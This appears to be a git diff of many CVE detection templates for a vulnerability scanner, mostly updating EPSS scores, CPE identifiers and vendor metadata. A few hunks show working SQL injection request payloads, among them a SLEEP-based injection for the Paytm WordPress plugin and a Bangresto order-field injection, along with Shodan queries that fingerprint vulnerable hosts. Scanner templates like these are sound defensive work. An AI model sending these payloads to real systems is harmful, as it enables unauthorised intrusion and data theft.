a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.29005 metadata: max-request: 2 shodan-query: title:"OpenCATS" diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 4b0850c661..3f3b56cb23 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.29005 metadata: max-request: 2 shodan-query: title:"OpenCATS" diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index e5c6798efa..7df2778b8d 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00071 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.29005 metadata: max-request: 2 shodan-query: title:"OpenCATS" diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 9c42c232b1..76fd5fd9e5 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0007 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.28777 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 858ebd69b0..f79ce6bc13 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.07021 + epss-score: 0.05929 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.92483 metadata: max-request: 1 fofa-query: app="kkFileView" diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index ca6dc5fb86..e4c138a4ec 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43164 cwe-id: CWE-79 - epss-score: 0.00074 + epss-score: 0.00076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.31098 metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 9600cea438..a9515ad8f7 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00074 + epss-score: 0.00076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.31098 metadata: max-request: 3 shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index 3990ed821d..0223f7819e 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00074 + epss-score: 0.00076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.31098 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index a0c55d99e7..273310b3f8 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43167 cwe-id: CWE-79 - epss-score: 0.00074 + epss-score: 0.00076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.31098 metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index d4c465b64a..9d5e8c8040 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43169 cwe-id: CWE-79 - epss-score: 0.00074 + epss-score: 0.00076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.31098 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index bc6ffe2a15..73c6fdf990 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43170 cwe-id: CWE-79 - epss-score: 0.06363 + epss-score: 0.08907 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.93778 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index ff8a278bf9..c83ad65b7e 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43185 cwe-id: CWE-79 - epss-score: 0.06047 + epss-score: 0.29169 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.96291 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index b559bfb09d..e73c395864 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00075 cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.30732 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index bc2dfd4c4b..894081b0df 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:wpswings:pdf_generator_for_wordpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index cdaa9cec1e..51b640c47e 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4325 cwe-id: CWE-79 - epss-score: 0.00064 + epss-score: 0.00071 cpe: cpe:2.3:a:ifeelweb:post_status_notifier_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.29012 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index a2852ce38d..8c90979ad8 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-434 epss-score: 0.96022 cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9925 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 3c2346658e..7d36084a8c 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 - epss-score: 0.05112 + epss-score: 0.59738 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* + epss-percentile: 0.97318 metadata: max-request: 1 shodan-query: http.favicon.hash:1749354953 diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index c55063f34e..743890ff8e 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 - epss-score: 0.09401 + epss-score: 0.422 cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96835 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 2aeeb98be3..9a0d152306 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44877 cwe-id: CWE-78 - epss-score: 0.97483 + epss-score: 0.97473 cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* + epss-percentile: 0.99945 metadata: max-request: 1 shodan-query: http.title:"Login | Control WebPanel" diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 438538003b..c04b4510af 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44944 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index bed761a07b..14b389625a 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44946 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 5132e5094a..b899598924 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44947 cwe-id: CWE-79 - epss-score: 0.0008 + epss-score: 0.00088 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.36702 metadata: max-request: 3 shodan-query: http.favicon.hash:-1499940355 diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 6df00ba727..da924d4015 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44948 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 49bf9cdb93..05ca35336c 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index b46106c091..2f4a227baf 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44950 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index e4369fe3eb..047599d29b 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44951 cwe-id: CWE-79 - epss-score: 0.00067 + epss-score: 0.00074 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.3053 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 98f54d6db4..6c9ea339d2 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44952 cwe-id: CWE-79 - epss-score: 0.05501 + epss-score: 0.06042 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* + epss-percentile: 0.92539 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 97535024df..5f4c2ea395 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00077 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* + epss-percentile: 0.31826 metadata: max-request: 5 verified: true diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index acd52bc182..81c75cc893 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00077 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* + epss-percentile: 0.31826 metadata: max-request: 5 verified: true diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index 93a83beca0..171363e953 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -6,16 +6,16 @@ info: severity: critical description: | WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: Update to version 2.7.7 or a newer patched version. reference: - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability - https://wordpress.org/plugins/paytm-payments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45805 + remediation: Update to version 2.7.7 or a newer patched version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-89 cve-id: CVE-2022-45805 + cwe-id: CWE-89 metadata: max-request: 2 verified: true @@ -29,7 +29,6 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | @timeout: 15s GET /wp-admin/post.php?post=1+AND+(SELECT+6205+FROM+(SELECT(SLEEP(6)))RtRs)&action=edit HTTP/1.1 diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml index b114e719e1..2ad70d2009 100644 --- a/http/cves/2022/CVE-2022-45835.yaml +++ b/http/cves/2022/CVE-2022-45835.yaml @@ -6,16 +6,16 @@ info: severity: medium description: | WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. - remediation: Fixed in version 2.0.0. reference: - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf - https://wordpress.org/plugins/phonepe-payment-solutions/ - https://nvd.nist.gov/vuln/detail/CVE-2022-45835 + remediation: Fixed in version 2.0.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 - cwe-id: CWE-918 cve-id: CVE-2022-45835 + cwe-id: CWE-918 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index c4cbff26b7..5e186231ac 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-601 epss-score: 0.00135 cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:* + epss-percentile: 0.47995 metadata: max-request: 2 shodan-query: http.html:"ILIAS" diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 5a2710d871..79001b8f00 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 - cwe-id: CWE-287 - epss-score: 0.00292 + cwe-id: CWE-306 + epss-score: 0.00535 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* + epss-percentile: 0.74218 metadata: max-request: 1 shodan-query: http.title:"KubeView" diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 6feb465c35..88c62e33ac 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46020 cwe-id: CWE-434 - epss-score: 0.00815 + epss-score: 0.00887 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* + epss-percentile: 0.8053 metadata: max-request: 6 verified: true diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 56761daf56..4ae27a0840 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46071 cwe-id: CWE-89 - epss-score: 0.00866 + epss-score: 0.01728 cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:* + epss-percentile: 0.86294 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index cfa3d7053b..654eaa6dd2 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46073 cwe-id: CWE-79 - epss-score: 0.00097 + epss-score: 0.00077 cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:* + epss-percentile: 0.31755 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index f76ca7c247..0919c497a0 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-46169 cwe-id: CWE-78,CWE-74 - epss-score: 0.96835 + epss-score: 0.96817 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* + epss-percentile: 0.99543 metadata: max-request: 1 shodan-query: title:"Login to Cacti" diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 7c0cff707b..9be7946e7a 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46381 cwe-id: CWE-79 - epss-score: 0.00064 + epss-score: 0.00071 cpe: cpe:2.3:o:niceforyou:linear_emerge_e3_access_control_firmware:0.32-07e:*:*:*:*:*:*:* + epss-percentile: 0.29012 metadata: max-request: 1 shodan-query: http.html:"Linear eMerge" diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index 6aa49f5888..8847704d75 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -14,11 +14,15 @@ info: cvss-score: 8.8 cve-id: CVE-2022-46443 cwe-id: CWE-89 + epss-score: 0.11658 + cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:* + epss-percentile: 0.94542 metadata: max-request: 2 verified: true + vendor: bangresto_project + product: bangresto tags: cve,cve2022,bangresto,sqli - variables: num: "999999999" @@ -30,7 +34,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username={{username}}&password={{password}} - - | POST /bangresto-main/staff/insertorder.php HTTP/1.1 Host: {{Hostname}} @@ -39,6 +42,7 @@ http: itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index 3579201530..8a51ed2af5 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -8,14 +8,23 @@ info: An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-46463 + - https://github.com/Vad1mo + - https://github.com/lanqingaa/123/blob/main/README.md + - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2022-46463 cwe-id: CWE-306 + epss-score: 0.01786 + cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:* + epss-percentile: 0.86525 metadata: max-request: 1 shodan-query: http.favicon.hash:657337228 verified: true + vendor: linuxfoundation + product: harbor tags: cve,cve2022,harbor,auth-bypass,exposure http: diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index bc73676b07..304c5bf9bf 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00081 cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:* + epss-percentile: 0.33383 metadata: max-request: 1 shodan-query: http.favicon.hash:-582931176 diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 5e7031c472..e71a21493a 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00076 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* + epss-percentile: 0.31252 metadata: max-request: 1 shodan-query: http.html:"kkFileView" diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index 08cae1b326..096cca517f 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47002 cwe-id: CWE-863 - epss-score: 0.02633 + epss-score: 0.03141 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* + epss-percentile: 0.89824 metadata: max-request: 3 shodan-query: 'Generator: Masa CMS' diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 142f17aa17..5780dbdd47 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47003 cwe-id: CWE-863 - epss-score: 0.01124 + epss-score: 0.01777 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.86482 metadata: max-request: 3 shodan-query: 'Generator: Musa CMS' diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 324b75aa4e..c03384020e 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -9,17 +9,24 @@ info: reference: - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2022-47615 + - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2022-47615 cwe-id: CWE-434 + epss-score: 0.00837 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.79914 metadata: max-request: 1 publicwww-query: "/wp-content/plugins/learnpress" verified: true + framework: wordpress + vendor: thimpress + product: learnpress tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi - http: - raw: - | diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 259ce17e5e..0985cd8777 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -15,8 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47945 + cwe-id: CWE-22 epss-score: 0.05688 cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* + epss-percentile: 0.92344 metadata: max-request: 2 fofa-query: header="think_lang" diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index aa04a38e9c..7a5bc9ee85 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 - epss-score: 0.97439 + epss-score: 0.97467 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.99939 metadata: max-request: 1 shodan-query: title:"ManageEngine" diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 1be59cb4a3..c45306c3bf 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 - epss-score: 0.92526 + epss-score: 0.93666 cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* + epss-percentile: 0.98767 metadata: max-request: 1 shodan-query: html:"Aspera Faspex" diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index a56ec38dca..e47ee8d3ce 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* + epss-percentile: 0.26092 metadata: max-request: 3 shodan-query: title:"opencats" diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 169d98867a..d593f5c83f 100644 --- 